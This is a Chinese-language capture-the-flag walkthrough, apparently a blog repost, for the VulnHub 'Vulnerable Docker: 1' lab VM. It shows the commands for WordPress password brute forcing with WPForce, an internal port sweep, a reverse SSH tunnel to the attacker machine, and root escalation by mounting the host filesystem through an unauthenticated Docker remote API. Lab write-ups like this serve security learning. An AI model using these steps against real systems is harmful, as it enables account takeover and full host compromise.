靶机地址:https://www.vulnhub.com/entry/vulnerable-docker-1,208/
靶机难度:中级(CTF)
靶机发布日期:2017年9月27日
靶机描述:
是否曾经幻想过在容器中使用docker配置错误,权限提升等问题?
下载此虚拟机,拔出笔尖的帽子并开始使用
我们有2种模式:-HARD:这将需要您结合使用docker技能和笔测试技能来实现主机妥协。-轻松:相对简单的路径,知道docker就足以破坏计算机并在主机上获得根。
我们已在可供您使用的各种机器/系统中植入了3个标记文件。如果您选择接受,则您的任务如下:
标识所有标志(总共2个:flag_1和flag_3)(flag_2被无意中遗漏了)
在主机上获得id = 0 shell访问。
目标:得到root权限&找到flag.txt
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机开机已经显示了IP:
192.168.56.135
nmap扫到了22和8000端口都打开了...可以看到这又是wordpress CMS
直接访问http8000..
直接上wpscan...
这边有挺多信息,有bob用户,存在robot.txt文件,都查看下吧...
http://192.168.232.134:8000/wp-admin/
是登录入口...另外一个没啥用...
这边不用rockyou.txt爆破网站,太浪费时间了...几百万个单词...
这边用WPForce爆破...
[链接](https://github.com/n00py/WPForce)
python wpforce.py -i dayu.txt -w /root/Desktop/dayu/10_million_password_list_top_10000.txt -u http://192.168.56.135:8000
命令直接进行爆破,结果:Welcome1 (不懂得可以去查看下链接)
这边还使用bp进行爆破也行,这边填写好代理后,填入bob账号,劫持...
然后发到intruder,放入字典即可爆破,这边我就不多解释了,知道结果即可...
成功登录...
二、提权
找到flag1:
进来后就很熟悉了,直接提权吧...
成功拿到低权后...
不能sudo...
这边发现本地网络有点问题...存在172.18.0.1~4都能ping通...查看下Docker基础架构看看...
应该是存在remote API未授权访问漏洞利用...
这里本来可以用:
[reGeorg](https://github.com/sensepost/reGeorg)
处理的,但是我不会...很尴尬...我这边用别的方法整代理.
我这里写了个sh...
hosts=(
"172.18.0.1"
"172.18.0.2"
"172.18.0.3"
"172.18.0.4"
)
END=65535
.......自己琢磨吧...
开启本地服务...
执行,发现了8022端口...在.3上...
查看172.18.0.3:8022的URL发现可以ssh登录...
openssh.deb是这个文件:http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
dpkg -x openssh.deb .; cd usr/bin; chmod +x ssh*; ./ssh-keygen -P '' -f id_rsa -t rsa; cat id_rsa.pub
用于登陆ssh...
chmod 600 ~/.ssh/authorized_keys
service ssh restart
将密匙放入本地ssh目录中...然后开启ssh...
./ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownhostsFile=/dev/null -v -i id_rsa -R 8022:172.18.0.3:8022 -fN root@192.168.182.149
成功开启代理...
本地访问8022即可登录...
可以看到docker,可以利用remote API未授权访问...
这边需要用外网...我这边设置的是桥接的局域网环境,我这边得重新弄下改外网环境...
先更新源...然后下载curl...
curl -fsSL get.docker.com -o get-docker.sh
sh get-docker.sh
docker ps
安装了一个docker,可以看到安装成功了...
参考[链接](https://www.secpulse.com/archives/55928.html)
docker run -it --rm -v /:/vol wordpress /bin/bash
使用volume挂载主机上的所有文件到一个目录...成功提权...查看到了flag3...
这台靶机可以学到Docker利用和remote API未授权访问分析和利用...非常好!!!
由于我们已经成功得到root权限和flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
原文始发于微信公众号(大余安全):VulnHub-Vulnerable Docker: 1
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论